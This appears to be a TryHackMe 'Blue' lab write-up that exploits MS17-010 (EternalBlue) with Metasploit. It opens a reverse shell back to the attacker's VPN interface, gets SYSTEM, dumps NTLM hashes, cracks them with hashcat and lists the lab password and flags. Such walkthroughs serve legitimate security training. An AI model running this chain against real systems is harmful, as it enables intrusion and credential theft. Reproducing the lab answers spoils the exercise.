TryHackMe: Blue write up

Hope you are doing well, so lets get started with the Blue machine on TryHackme.

before we start the machine lets make sure we are connected to the TryHackeMe VPN. to do so head over to the link and download the configuration file. Once the file is downloaded, head over to the terminal and connect using openvpn as follows:

sudo openvpn vpnfile.ovpn

Once we are connected, we can proceed with the tasks

First we start the machine.

To scan the machine we run the following nmap command

nmap -sV -vv — script vuln TARGET_IP

we see that the following ports are open

135.139,445,3389,49152,49153,49154,49158,49159

As we can see there are 3 ports open under 1000

in the nmap ouput we see that the machine is vulnerable to ms17–010

smb-vuln-ms17–010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17–010)
| State: VULNERABLE
| IDs: CVE:CVE-2017–0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17–010).
|
| Disclosure date: 2017–03–14

We start metasploit with the command

msfconsole

we search the metasploit data base by searching for ms17_010

msf6 > search ms17–101

search result

metasploit returns the name of the exploit

exploit/windows/smb/ms17_010_eternalblue

in order to use the exploit, select the exploit by running the command by running use <number> , number here is the number of the exploit

msf6 > use 0

once we have the exploit selected, we can display the options by running

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

now we have to set the rhosts

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.90.60

to set the payload we run

since we are accessing the machine over vpn we have to also set the lhost

to do so run the following command

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0

to set the payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp

once all options are set we execute the exploit

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

after some time you should have a shell. If the exploit fails stop all jobs by executing

msf6 exploit(windows/smb/ms17_010_eternalblue) > jobs -K

and now try running the exploit again. If the exploit fails again, try rebooting the target machine and change the rhosts value to the new ip address

once you have the shell, we can background this shell by running background and then y, now to upgrade the shell to meterpreter shell we can use the exploit

msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter

to use this exploit we set the session as follows

set session 2

and then

run

After trying multiple time i was not able to get a meterpreter shell and the only solution was to use the windows/smb/ms17_010_eternalblue without setting the payload

default payload

as we can see we have got a meterpreter shell

to list all process we run

ps

we note down the process id where user is NT AUTHORITY\SYSTEM

its best to use winlogon.exe as it will have most of the permissions

once we have migrated to another process we can run the following

hashdump

now we can crack the hash using hashcat, to do this we copy the hashes and store it in a file

to run hashcat we have

hashcat -m 1000 hashes /usr/share/wordlists/rockyou.txt

once the hash is cracked we can see the password with

hashcat -m 1000 hashes /usr/share/wordlists/rockyou.txt — show

we see that the password is alqfna22

we can see that the first flag is at location C:\

flag 1 flag{access_the_machine}

to find flag we head over to the configuration file where hashes of passsword are stored

flag 2 flag{sam_database_elevated_access}

to find flag 3 we head over to Jons Document folder

flag 3 flag{admin_documents_can_be_valuable}

Cloud Support engineer at amazon.